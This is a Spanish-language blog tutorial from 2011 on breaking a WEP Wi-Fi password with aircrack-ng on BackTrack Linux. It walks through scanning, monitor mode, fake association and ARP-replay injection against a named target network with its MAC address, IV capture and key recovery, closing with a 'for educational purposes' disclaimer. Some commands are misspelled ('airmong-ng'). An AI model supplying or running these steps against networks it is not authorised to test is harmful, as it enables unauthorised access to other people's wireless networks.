24 abr 2011

Romper clave wifi WEP (Actualizado).


Anteriormente en Linux RD habíamos hecho este mismo tutorial, ahora lo que hicimos fue ponerlo un poco mas simple y con gráficos.

Para este tutorial se necesita:    un 10% de conocimiento en redes
                                                un 20% de conocimiento en Linux 
                                                un 70% de entusiasmo y ganas

Antes que todo para este tutorial vamos a trabajar en Back Track Linux, ya que viene con el kernel preparado para este operativo ,lo bajamos y lo instalamos Live en un CD o USB. Nota: aircrack  no bien funciona en las ultimas versiones de Ubuntu o Fedora.

Una ves subamos con Back Track Linux en nuestra Pc, estaremos en el shell y para poder entrar al gráfico hacemos startx para subir con el gráfico. 

Nota: nuestra tarjeta wireless debe de estar libre, osea no puede estar conectada a ninguna red, así que recomiendo que dejen cargada esta pagina y comenzamos:


1) Primero debemos ver las redes disponible en nuestro entorno y  elegir la red con seguridad WEP , haciendo:
 airodump-ng wlan0
 Luego que elijan presiones ctrl + c para dejar frisado y asi anotar los datos. La red que yo elegí fue Thomson0ADA39.



2) Ahora tenemos que poner nuestra tarjeta en modo monitor, sudo airmong-ng start wlan0 # de canal , fíjense en el canal donde dice CH. La red en mi caso que quiero romper esta en el canal 11:
airmong-ng start wlan0 11
 Tomen en cuenta el monitor que elige, en nuestro caso fue mon0, esto puede variar dependiendo de cuantas veces lo hagamos y si desean detenerlo solo hagan airmong-ng stop wlan0

3) Intentaremos asociarnos falsamente a la red wireless, aireplay-ng -1 0 -e 'nombre de la red' -a "Mac Address del Objetivo" -h "TU MAC address de wlan0" interfaz monitor ( seria mon0), Para saber nuestra Mac hacemos ifconfig wlan0 Nota: recuerda poner las '' y las "" donde lleven.
aireplay-ng -1 0 -e 'Thomson0ADA39' -a "00:26:44:08:75:37" -h "00:1e:64:6b:d0:4c" mon0
 Si este paso es exitoso saldra algo como esto:
Si no fue exitoso, pudo haber sido por varias razones: la señal esta muy lejos o cometiste algo error en los pasos anteriores.


4) Abrimos en una terminal y ponemos: aireplay-ng -3 -b "Mac Address Objetivo" -h "Tu MAC address" interfaz monitor, para lanzar ataques.
aireplay-ng -3 -b "00:26:44:08:75:37" -h "00:1e:64:6b:d0:4c" mon0
Abrimos otra y ponemos: airodump-ng --ivs -w "archivo-nombre" -c "canal" "interfaz monitor" ,esto es para la captura de paquetes ivs con lo que descifraremos la clave.
airodump-ng --ivs -w "captura" -c "11" "mon0"
 El dato mas importante es donde dice "DATA" ya que si se mueve muy rapido, mas fácil seria descifrar la clave.

5) Cuando hayan al menos 15 mil o 20 mil ivs (Initialization Vectors)  pasaremos a descifrarla con aircrack-ng , esto puede tardar unas 8 horas , pero podemos ir probando cada 2 horas para ver si obtuvo la cantidad necesaria.
aircrack-ng -a 1 -f 2 *.ivs
Elegimos la red con numeraciones a la que queremos sacarle la clave , esperamos un rato a que haga el matcheo,Si tiene éxito la clave seria así:

KEY FOUND!! [ AA:BB:CC:DD:EE ] (notese que es en hexadecimal) 


Que lo disfruten!!! esta de mas decirle que este tutorial es con fines educativo y cualquier irregularidad no somos responsables.
Posted by Sol Tropical

0 comments:

Publicar un comentario

 
;